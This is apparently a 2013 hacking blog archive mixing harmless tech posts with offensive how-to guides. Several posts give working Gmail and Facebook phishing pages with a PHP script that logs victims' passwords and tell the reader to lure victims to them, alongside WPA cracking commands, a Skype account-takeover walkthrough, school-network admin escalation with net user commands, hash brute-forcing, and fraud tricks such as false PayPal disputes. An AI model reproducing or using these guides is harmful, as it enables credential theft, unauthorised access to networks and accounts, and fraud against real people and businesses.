Monday, July 15, 2013

hack mobile phones

How Tracing a Mobile Phone Location With Google Latitude Works

The cool thing about Google Latitude is that there are really no fancy, expensive gadgets required. All you need is a mobile phone and you can build what’s essentially a GPS network of friends, without the need for GPS technology. Wondering whether your buddy Jim is still at work? Just log onto Google Latitude, or check Google Maps on your phone, and sure enough, Jim’s icon shows up on the map where he works. Did your best friend go missing after her date the other night? If she left her phone on, all of her friends can check out where she’s currently located.
The potential uses of this technology are amazing, and Google is just getting started by integrated it’s cellular triangulation technology with Google Maps. MakeUseOf authors previously covered similar applications, such as NavXS and BuddyWay. However, BuddyWay requires that the phone or PDA is GPS enabled. The convenience of Google Latitude is that you don’t need GPS, and it’ll work on almost any mobile phone that can use Google Maps. According to Google, these include Android-powered devices, iPhone, BlackBerry, Windows Mobile 5.0+ and Symbian.


tracing a mobile phone location
Setting it up is as easy as typing your phone number into the entry field on the Google Latitude main page, or you can visit “google.com/latitude” with your mobile device and install it directly. It’s basically the latest version of Google Maps with Latitude embedded. Once you’ve installed this version on your phone, you’re good to go – just click on “Menu” and then “Latitude.”

Setting Up Google Latitude With a Network of Friends

Setting up the application on your mobile device is a piece of cake. Once you open Latitude on your phone, you can immediately start adding friends with their email address. If none of your friends have Latitude installed on their phones yet, forward them this article and tell them to install it!
trace mobile number location
When you first fire up the map after you’ve enabled Latitude with your profile, you’ll immediately see your regular Google map pointer replaced by your picture icon, email address and your location the last time your device was polled.
trace your cell phone
This is cool and everything, and as I outlined in a previous MakeUseOf article on Google Maps, this application does a great job keeping the map updated with your status within a certain radius, depending on where the nearest cell towers are. However, while keeping track of yourself on the map while you’re driving or walking around town is fun, it can get pretty boring when you’re doing it alone. Latitude lets you have a little bit of fun with your network of friends by letting you add each of them to your Latitude “friends” list so that you can see their locations too. To test this feature, I called up a friend of mine with a Blackberry down in Derry, New Hampshire, and asked him to fire up Latitude and add me as a friend. Once we confirmed each other as friends, I instantly showed up on his map and he showed up on mine!
added friend
When you click on your friend’s icon, you can see their contact and location information, or you can choose how you want to share your own information with this specific friend. This means that you can pick and choose the level of privacy that you want for your own status updates based on individual friends. You can provide your exact location to your best friend, while keeping your details somewhat vague for your parents. Also, within the Latitude menu, you can set your privacy level for everyone across the board.
privacy
You can toggle your privacy settings back and forth, so that when you’re somewhere that you don’t want anyone to know about, you just flip your status to “Hide your location.” When you’re back where you’re supposed to be, you just flip your privacy back to “Detect your location.” If you want to fool your friends (or your boss) into thinking that you’re somewhere you’re not, you can manually set your location.

Using Google Latitude Online

Of course, tracing a mobile phone location isn’t enough for Google. This is the part that really made me raise my eyebrows. Google has incorporated this mobile technology into an online gadget that you can view and manipulate from your iGoogle page.
igoogle5
This means that even if you don’t have your mobile phone with you, but you have access to the Internet, you can check out where all of your friends are at the moment, or update your own location on Latitude so that they know where you are. This whole concept takes the whole architecture and intent of Twitter and adds another entire level of graphical interactivity to it, with visual, real-time status updates for your friends. The next evolution of this technology that I envision is the ability to embed a Google Latitude widget in your blog or web page that allows you to share your own Latitude location information with your readers. Since the status bar already exists for short text updates, this feature would turn Google Latitude into a more graphical version of Twitter.
Have you ever used any of the latest “friend tracking” mobile phone technologies for tracing a mobile phone location? Which one is your favorite? Share your opinion in the comments section below.

Friday, July 5, 2013

Hack password using Hash

How to Hack Password using Cain and Abel

First Download Cain and Abel Software.

Open cain and abel click on cracker option.
How to Hack Password using Cain and Abel
Select LM & NTLM Hashes and click “+” sign


How to Hack Password using Cain and Abel
Click on Next
How to Hack Password using Cain and Abel
I want to recover password of “raaz” user name then right click on raaz> Brute Force Attack > NTLM Hashes.
How to Hack Password using Cain and Abel
Now you will see window similar to below image. Click on start.
How to Hack Password using Cain and Abel
After successfully finished performing password recovery it will show you password like in the image below.
How to Hack Password using Cain and Abel

Friday, April 12, 2013

Hack wifi using command prompt

HACKING UR COLLEGE OR SCHOOL PC TO BYPASS WEBFILTER AND TO SEND A MESSAGE TO ALL OTHER PC

Open command prompt from where it is Banned

Open up Command Prompt (Start>Run>Command.com)

IF U Can't use command prompt at your school?

Open up Microsoft word..Type:

Command.com

Then save it as Somthing.bat.

Warning: Make sure you delete the file because if the admin finds out your in big trouble.

--Adding a user to your network--

Type:

Net user Hacker /ADD

-----

That will add "Hacker" onto the school user system.

-----

Now you added users lets delete them!

Type: Net user Hacker /DELETE

Warning: Be carefull it deletes all their files.

-----

"Hacker" will be deleted from the user system.

-----

if It says access denied

it's because your not admin!

----

Now lets make your Admin!

----

This will make Hacker an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.

Type: net localgroup

It will show you what they call admin, say at my school they calll it

adminstrator so then i would

Type: net localgroup administrator Hacker /ADD

----

Getting past your web filter.

Easy way: Type whatever you want to go on say i wanted to go on miniclips bug on wire i would go to google and search miniclip bug on wire

then instead of clicking the link i would click "cached".

Hard way: I'm hoping you still have command prompt open.

Type: ping miniclip.com

And then you should get a IP type that out in your web browser, and don't forget to put "http://" before you type the IP.

-----

Sending messages throught your school server

Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type

Net Send * "The server is h4x0r3d"

Note: may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out.

Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use

Net Send Hacker School * "The server is h4x0r3d"

The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example

NetSend Varndean dan,jimmy,admin "The server is h4x0r3d"

use commas to divide the names and NO SPACES between them.

or

Allowing dos and regedit in a restricted Windows

open notepad and type the following:

REGEDIT4

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]

"Disabled"=dword:0

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]

"DisableRegistryTools"=dword:0

Save it as something.reg then run it

Wednesday, March 13, 2013

unblock youtube

According to trap17.com this is how you access the internet:
1. Create a new text file that says: @start "" /b "C:\Program Files\Internet Explorer\iexplore.exe" %*
2. Rename the file "e.bat"
3. Copy this file to your profile folder
4. Open a command prompt window and type "e" followed by a URL of a website you want to go to. For example, if you wanted to go to Mahalo you would type (without the quotes): "e www.mahalo.com"
I haven't tried this myself, so hopefully it works.

To unblock websites try http://www.mathtunnel.com/ apparently at this site you can just type in the url of any website you want to unlock. No command prompt necessary.
Or you can try these two command prompt tricks from http://revision3.com/forum/showthread.php?t=4885
Trick 1: (In this example www.mahalo.com stands for the url of the website you want to unblock.)
1. Open the command prompt
2. Type: ping www.mahalo.com
3. Copy the IP next to "Reply From"
4. Paste the IP into your address bar.

Trick 2: (In this example www.mahalo.com stands for the url of the website you want to unblock.)
1. Open command prompt and notepad.
2. Write "ping localhost" without the "" into the command prompt.
3. Copy the IP into the notepad file, hit tab and write localhost
4. In the command prompt write: ping www.mahalo.com
5- Copy the IP of the site into the notepad file, hit tab and write the link to the site, without http://, as in "www.google.com"
6- Hit enter and repeat step 5, should look like this
00.00.0.00 localhost
000.000.00.00 www.website.com
000.000.00.00 www.website.com

7. Save the notepad file into your desktop as "host."
8. Go to My Computer>Your Hardrive>WINDOWS>system32>drivers>ect and drag the notepad file into that folder.

Just in case those tips don't work, I also found you a couple video tutorials:
YouTube: Unblock that blocked site!

Access blocked sites

1. Increase the size of your browser cache. If the static parts of a site (like background graphics, CSS, etc) are stored in the local cache, your browser can safely skip downloading these files when you re-visit the site in future thus improving speed.

2. Turn off web images, the Adobe Flash plug-in, Java Applets and JavaScript from your browser settings as these files are often the bulkiest elements of any web page.

3. The Google Transcoder service at google.com/gwt/n can split large web pages into smaller chunks that will download more quickly on your computer.

4.Monitor your Internet speed to determine hours when you get the maximum download speed from the ISP. Maybe you can then change your surfing schedule a bit and browse more during these "off peak" hours.

5. Finch can serve a light-weight version of any website in real-time that is free of all bells and whistles. For instance, the New York Times homepage with all external resources can weigh more than a MB but Finch trims down the size by 90% so the site loads more quickly on a slow web connection.

6. Flinch (mentioned at #4) is good for reading regular websites but if you just need to check the latest articles published on your favorite blogs, use BareSite. This service will automatically detect the associated feed of a website and render content quickly inside a minimalist interface.


7.You can use a text browser like Lynx or Elinks for even faster browsing. It downloads only the HTML version of web pages thus reducing the overall bandwidth required to render websites.

8. When searching for web pages on Google, you can click the "Cache" link to view the text version of a web page stored in the Google Cache. Alternatively, install this GM script as it adds a "cached text only" link near every "Cached" link on Google Search pages.

9. Move your web activities offline as far as possible. You can send & receive emails, write blogs and even read feeds in an offline environment.

10. Applying the same logic, you may also consider using tools like Web In Mail or Email The Web as they help you browse websites via email. Just put the URL of a page (e.g., cnn.com) in the subject field of your email message and these services will send you the actual page in the reply.

11. Bookmarklets are like shortcuts to your favorite web services. You neither have to open the Gmail Inbox for composing a new email message nor do you have to visit Google Translate for translating a paragraph of text. Add relevant bookmarklets to your browser bar and reduce the number of steps required to accomplish a task.

12. Use the netstat command to determine processes, other than web browsers, that may be secretly connecting to Internet in the background. Some of these processes could be consuming precious bandwidth but you can block them using the Firewall.

13. Use URL Snooper to determine non-essential host names that a website is trying to connect while downloading a web page. You may block them in future via the Adblock Plus to filter out advertising banners on web pages.

14. If you don’t want to spoil your web surfing experience by stripping images and other graphic elements from a web page, get Opera Turbo. It will first fetch the requested web page on to its own server and then send it to your machine in a compressed format. Opera Turbo won’t change the layout of a web site but can lower the image resolution so that they load faster on slow Internet.

Source:-labnol

Thursday, March 7, 2013

HACK WIFI PASSWORD WITH BACKTRACK 5

"WARNING:Don't Hack any authorized router,otherwise you'll be put into jail."
 
Rules to Follow
    • A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
    • here a link to download it http://www.backtrack-linux.org/downloads/
    • A nearby WEP-enabled Wi-Fi network 
    • Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.                                            

 Steps to Follow:
Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step 4 :

airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step d :

airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download
crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download
pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install


tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install


Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the
wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.


Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
Make sure pyrit workable on your system :

pyrit list_cores

That's all! See you.
THANKS YOU AND plz follow me in blog.............


Saturday, March 2, 2013

Hack WEP encrypted websites

I am going to discuss the use of a tool named as FERN WIFI CRACKER using which in general you can hack WEP as well as WPA secured WIFI networks and this GUI based application is quite easy to use plus, it cracks password in quite fast time if you have a good computer with fast RAM and processor. In backtrack 5 its already installed an is properly configured but you can get it on Ubuntu and other Linux flavours also. Read this post to learn how to setup FERN for Ubuntu.Setting Up and Running Fern WIFI Cracker In Ubuntu What this application uses has been listed in the post. After installing Fern in any linux or else you can also use backtrack 5 for this purpose. Read here how to install backtrack 5 :- and Install Backtrack 5 as dual boot (Windows and Bt5 Together). Whatever OS you are going to use just run Fern and read below.
Using Fern Wifi Cracker:-

Click the refresh button to load monitor interfaces. Then hit scan button, its for dual functioning mean, at first hit it will start scanning and again if you hit it it will stop scanning.

Fern Wifi Cracker

When any WIFI network with WEP and WPA will be found by FERN it will be displayed as in this below screen shot. You have to hit button of WPA or else WEP inorder to crack the password for any of the WIFI network.

WEP and WPA scan FERN

Cracking WEP encryption based WIFI password key:-

After hitting the activation button of the WEP attack. What happens can be seen in screen shots below:-

So, key has been successfully recovered.
Cracking WPA encryption based WIFI password key:-

Cracking WPA encryption based WIFI password

So, key has been successfully recovered, as you can see.
Where the keys database can be found later?
All the keys which are recovered are automatically saved here:- /usr/local/bin/Fern-Wifi-Cracker/key-Database/Database.db. Plus you can also add keys manually.

Fern Key database

Tracking provider of WIFI Router's location using Mac Address:-
Here is the geographical location mac addres tracker. You can run it from :- ToolBox>Geolocatory Tracker

Fern Mac Tracer

- See more at: http://www.hackersthirst.com/2011/08/hackingcracking-wpawep-encrypted-wifi.html#sthash.JeQQoOdS.dpuf

Wednesday, February 27, 2013

Hack any skype account


Hack any skype account in 6 easy steps

Major vulnerability of Skype's password reset system has went public today.
The only thing you need to obtain full access to any Skype account is primary email of that account (the email which used when the Skype account been registered).
Following guide contains both - how to steal an account, and how to protect your account (scroll down for that).
Update 1 (November 14, 2:00am PDT): Skype made the password reset system disabled. So link on the step 4 is not working for me now (starting from November 14, 2 am PDT).
Update 2 (November 14, 6:00am PDT): Skype re-enabled the password reset system, but now it will not sent recovery token to attacker's client. The hole (gate, almost highway road) is closed.

For example, I know somebody's email - crackme33@yahoo.com , let's hack his Skype!

1. Go to the Skype website, register new disposable account. In email field, put target's email.

If the email, you typed into form, attached to some skype account, then it will say that "You already have a Skype account", that means you can hack it!
So, complete the form, provide some fake BOD, gender, country, answer to question "How do you intend to use Skype?" as personal, fill any skype name (REMEMBER IT), it will give you some suggestions of not taken ones, assign some password  (REMEMBER IT), solve the captcha, proceed forward - push the continue button. 
You will be redirected to you new account dashboard. Logout from it.
 
2. Run the Skype application with those new credentials.
3. Since we just logged in to a fresh account, at home screen of the Skype application, there will be advertisement "Find your friends and say hello", click somewhere to bring focus on that part of screen (I clicked where the red cross is drawn):
Then push F5 button on your keyboard, it will refresh the home screen. Do that 3-4 times until you see "Bring your Facebook friends into Skype" advertisement. Click "No thanks, blah-blah-blah".
You will get the home screen with some banner. 
4. Go to Skype's password reset system.Put the target's email. In my case - crackme33@yahoo.com .
Click "Submit button", and after several seconds, you will see Skype's pop-up notification - "Password token".
5. Go to Skype application, on the home screen you will see Password token, click on "more info", go to "temporary code link":
6. Browser will open page, where you can select any skype account registered to target email, in my case there are two account - my disposable and target:
Choose target's account and click "Change password and sign me in":
 You will be redirected to login form:






You are all set!
P.S. I have changed primary email for that test accounts, so do not try hack them. Just in case. =)

How to protect your accounts

You already changed password for the target account, know the skype login, and able to use that target skype account. But somebody could take it back from you, just as you did (owner for example).
To prevent that you need to change your primary email to some address, unknown to anyone.

To do that:
1. Sign in on skype website.
2. Go into the "profile" link (click to enlarge):


3. On account information, go down, to "Contact details", click "Add email address":
4. Add your email address, which unknown to anybody, but you:
Click save button at the bottom of the form. After page reload, refresh page again to prevent some strange glitches of the site (if you will not reload the page, after you do following steps, it will forget steps 4 and 5 and discard that little work).
5. Scroll to Contact details again. Click on "Add email address" again. Switch primary email to the new one:
Click "Save" button at the bottom of the form, again.
It will ask you for your password. You know it already. Type password and click button by mouse, not by "Enter" key.
After page reload, refresh page again to prevent some strange glitches of the site (described above).
6. Scroll to Contact details again. Click on "Add email address" again. Delete (with backspace and/or delete buttons) all emails but primary:

7. Click "Save" button at the bottom of the form. Make sure all your changes applied (it sometimes require two or more attempts, since the site is developed by curly-handed programmers).
8. Tell to friends how to protect a skype account. ASAP
At the time there is no other way to protect your skype account, except changing of primary email to some unknown address.
Once account is stolen, it has ability to retrieve all your IM history from other peers.
If you already lost your account, contact to all your necessary contacts and tell them to remove you from their contact list. It prevents IM history interchange (if it is not already happened).

There is how mailbox of target looks like:



Thus target will receive notifications regarding password change, but initial owner have less than one minute to understand and take action, it is almost impossible to login into skype website, change emails, when a hacker already there.
Disclaimer: The information provided on in this blog is to be used for educational purposes only. The blog author is in no way responsible for any misuse of the information provided.

Wednesday, February 20, 2013

Pair of musical hacks use sensor arrays as keyboards

 

Pair of musical hacks use sensor arrays as keyboards

sensor-driven-musical-keyboards
This pair of musical keyboard hacks both use light to detect inputs. The pair of tips came in on the same day, which sparks talk of consipiracy theory here at Hackaday. Something in the weather must influence what types of projects people take on because we frequently see trends like this one. Video of both projects is embedded after the jump.

On the left is a light-sensitive keyboard which [Kaziem] is showing off. In this image he’s rolling a marble around on the surface. As it passes over the Cadmium Sulfide sensors (which are arranged in the pattern of white and black keys from a piano keyboard) the instrument plays pitches based on the changing light levels. [Thanks Michael via Make]

To the right is [Lex's] proximity sensor keyboard. It uses a half-dozen Infrared proximity sensor which pick up reflected light. He calls it a ‘quantised theremin’ and after seeing it in action we understand why. The overclocked Raspberry Pi playing the tones reacts differently based on distance from the keyboard itself, and hand alignment with the different sensors.

Sunday, February 17, 2013

Facebook Account Deleter

Facebook Account Deleter (100% Working)

Image


Download

http://www.easy-share.com/1915011059/TU ... ersion.rar

Requirements:

1).Net Framework 4 Client Profile (x86 and x64) / If you dont have it, download it from here:http://www.microsoft.com/downloads/en/details.aspx?FamilyID=5765d7a8-7722-4888-a970-ac39b33fd8ab
2)Microsoft Visual Basic Power Packs 3.0 / If you dont have it, download it from here:http://www.microsoft.com/downloads/en/details.aspx?FamilyID=371368A8-7FDC-441F-8E7D-FE78D96D4063
3)Finally, download this: http://go.microsoft.com/fwlink/?LinkID=145727&clcid=0x804


One of the best tool every take it today to delete others account. It is 100% virus free I have personally tested it.

Saturday, February 16, 2013

VM Ware Fusion 3.1


VMWare Fusion 3.1 Beta On Grounds

Check out the VMWare Fusion 3.1 Beta which have been out just now. Its includes some of the significant features which many of the users have been waiting for. Some of them are really good which mostly includes graphic issues.


VMWare have been the major choice for the users to run Windows on Mac and pentesting for most of us on windows. The Beat 3.1 is out which have some major improvements in 3D application like games and windows Aero stuff…

OpenGL 2.1 is now also supported in this version for Windows 7 and Windows Vista. They claim better DirectX 9.0 SM3 performance as well (and hopefully that means more DirectX 9.0C app compatibility).

You can configure larger virtual machines as well, with the maximum virtual disk expanded from 950 GB to 2 TB. They now support up to 8-way symmetric multiprocessing as well. These are some of the features you will see in this Beat version.

VMware_fusion_windows_7_aero
You can download the beta here, test it, and have some of the nice features early for your use. If you want you can also give some tips to them and help them get doing the thing done fast for the final version.

So there you go - Download

Suffering Connection Issues

XBox Live Hacked or Suffering Connection Issues

Today Xbox Live users are suffering some Connection Issues and this is excepted as yesterday only the Xbox live account of Xbox’s Live Programming director’s was Hacked. So this points to the Xbox Live is been hacked aka compromised.
xboxlive
It is more likely that the Xbox live is hacked as the account of one of the makers of the Xbox live account was hacked yesterday only. While this can be a Connection issues too as the Expansion pack of Modern Warfare : “Stimulus Package” is out today which may have caused problems for the Xbox live servers as of large incensement in the connections ...

Xbox Support’s Twitter account is loaded with communications with customers about the problem, and the official support website at www.xbox.com/support is being bombarded by users.

“We’re aware of the issue and it is being worked on. Stay tuned for updates.”

An error code of 80150019 have been shown to the users of the Xbox live users. As the users are like not happy with this situation and would be likely as the Microsoft is in problems again.

… Talking about the Hacked account of Major Nelson’s of Xbox Live, Shortly after the hack happened, the Web site Lightzz took credit for the hack, posting a video of it, along with the hacker's Skype name. He is offering to hack other accounts as well.


Well whatever is going we will update this post as soon as Microsoft figures it out is it hacked or connection issues.

Watch free movie online

How to watch a movie on www.amazon.com for FREE

This is really simple... All you need is an Amazon account with at least $5 balance.

1. Go to http://www.amazon.com

2. Sign it your account.

3. Watch a movie on Amazon (1 day rental), and after it is done and the money has been deducted from your amazon account, contact support.

5. Tell their support that you accidentally clicked on the movie and didn't want to rent it. Ask them for a refund of the rental to your account.

6. They should respond with 2 days and the refunded amount should be in your account.

(I'm not sure how many times you can do this on a single account before they catch on.) So Try creating multiple accounts :D

Premium Account

Get FILEBOX.COM Premium Account for FREE


Cyberlocker Switzerland has purchased filebox.com and thus they have launched a new affiliate program for it.

In order, to promote the site they are offering the following for the site:

1. 6 month free premium account

2. 90% payout on all Premium Sales from your files
Use the coupon code

free6mtfb

to get your Premium 6 month account ! So jus go n register with this coupon code..

Monday, February 11, 2013

Social Engineering

What is Social Engineering?

Social engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.[1] While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim.


"Social engineering" as an act of psychological manipulation was popularized by hacker-turned-consultant Kevin Mitnick. The term had previously been associated with the social sciences, but its usage has caught on among computer professionals.
Example 1: You receive an e-mail where the sender and the manager or someone on behalf of the support department of your bank.

In the message he says that the Internet Banking service is presenting a problem and that this problem can be corrected if you run the application attached to this message.

The implementation of this application presents a screen similar the one you use to access bank account, waiting for you to type your password. In fact, this application is prepared to steal your password to access the bank account and sends it to the attacker.

Gmail hacking

Gmail Hacked
 This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.

Steps for Creating Phishing or Fake web Page:

Step 1:
Go to the gmail.com.  Save the Page as "complet HTML" file

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

Step3:
 Upload those image to tinypic or photobucker.com.  copy the url of each image.

Step4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5:
Search for the

 action="https://www.google.com/accounts/ServiceLoginAuth"

Replace it with

action="http://yoursite urlhere/login.php"

 save the file.
Step6:

Now you need to create login.php
 so you need to open the notepad and type as

<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save it

Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.


Step 8: 
create an email with gmail keyword.
 like : gmailburger@gmail.com

Step 9:
  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.



 Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url

Facebook Phisher

Facebook Phisher 

My readers use to ask how to hack Facebook accounts.  Most of the people curious to know how hackers take control of their accounts.  In this post, let me clarify those doubts.

Here, i am going to explain one of the popular social engineering attack(luring user into do whatever you asked to do.), called "phishing" .

Phishing is one of the popular hacking technique used by hackers to lure victims into giving their login credentials.

Phishing WebPage:
Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website.

Let me explain how to create a facebook phishing page.

Step 1:
To make a fake page of the target website , You can simply the source code of the website and save as html page.   In our case , it is facebook.  Go to facebook and right click on website .  Select "View source" and copy the code to notepad.


Step2:
Now search (Press ctrl +f) for keyword "action"  in that code.

You fill find the code like this:



Here, let me explain what "action" means to.  If you have some basic knowledge of web applications, then you already know about that.  'Action' is a HTML attribute that specifies where to send the form-data when a form(In our case, login-form) is submitted.

In the above code, the action attribute has the value that points to facebook login php file (https://login.facebook.com/login.php).  So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .

To capture the form-data, we have to change the action value to our php file. So let us change the value to ' action="login.php" '.  Note: I've removed ' http://login.facebook.com/' from the value.

Save the file as index.html.

Step 3:
Now , let us create our own login.php file that will capture the entered data and redirects to original facebook page.

Open the notepad and type the following code:
<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save this file as "login.php"

Step 4:
Open the notepad and just save the file as "pswrds.txt" (without any contents).

Step 5:
To host your phishing page, you may need a webhosting.  You can create a free account in free web hosting providers. Once you have created account in free hosting site, you can host your files and run.  Also, your files can be viewed by visiting a specific URL provided when you create account. For example : 'your_url_name.webhosting_domain.com'.

Now upload those files(index.html,login.php,pswrds.txt) in the free Web hosting site. Make sure your fake page is working or not by vising your url. 

Now , You have to lure your friends into login into your phishing page. Once they login into the page, you can see the login credentials being stored in the "pswrds.txt" file.

Saturday, February 9, 2013

Share cash premium account


How to get a FREE ShareCash Premium Account.

I bet most of you here have heard of Share Cash.org right?

Here is how to avoid completing surveys on their site.
 This following method has worked numerous times.
Send an email to admin@share cash.org with something like this- Hello, I am just writing this email to bring attention to the faulty survey system, I have tried multipul times to unlock a simple .01kb file, and failed, nearly 2 hours wasted.
I have now signed up to over 20 different product mailing lists, entered my phone for multiple billing services and completed numerous surveys, but still my download is still locked.
It unlocked once, but my browser immediated blocked the download.
Regards. If it worked correctly, he will reply back to your email with a free 2 Day Premium Account. Enjoy!
 Have fun downloading some fake generators.

Amazon pirated


How to watch a movie on www.amazon.com for FREE This is really simple...
All you need is an Amazon account with at least $5 balance.
1. Go to http://www.amazon.com
 
2. Sign it your account.

3. Watch a movie on Amazon (1 day rental)

4. After it is done and the money has been deducted from your amazon account, contact support.

5. Tell their support that you accidentally clicked on the movie and didn't want to rent it. Ask them for a refund of the rental to your account.

6. They should respond with 2 days and the refunded amount should be in your account. (I'm not sure how many times you can do this on a single account before they catch on.)

So Try creating multiple accounts :D

Free pizza online


How To Get Free Dominos Pizzas Want free pizza? Read below...
You need PayPal and you also need to be in a place that Dominos deliver to.

1. Go to http://www.dominos.co.uk/Default.aspx

2. Order a pizza.

3. Receive the pizza.

4. Take pictures of your pizza and post them here.

5. Go to PayPal.

6. Dispute the payment. (Say that the pizza never arrived or say that the pizza was cold. They can't prove you wrong.)

7. Eat your pizza and wait for your payment to be reversed.

Free purchase

Get anything on amazon/paypal checkout for free

I'm not going to do this and never have done it because it is illegal and unethical but it is possible to get anything on paypal checkout or amazon.com for free using tamper data, a firefox addon.

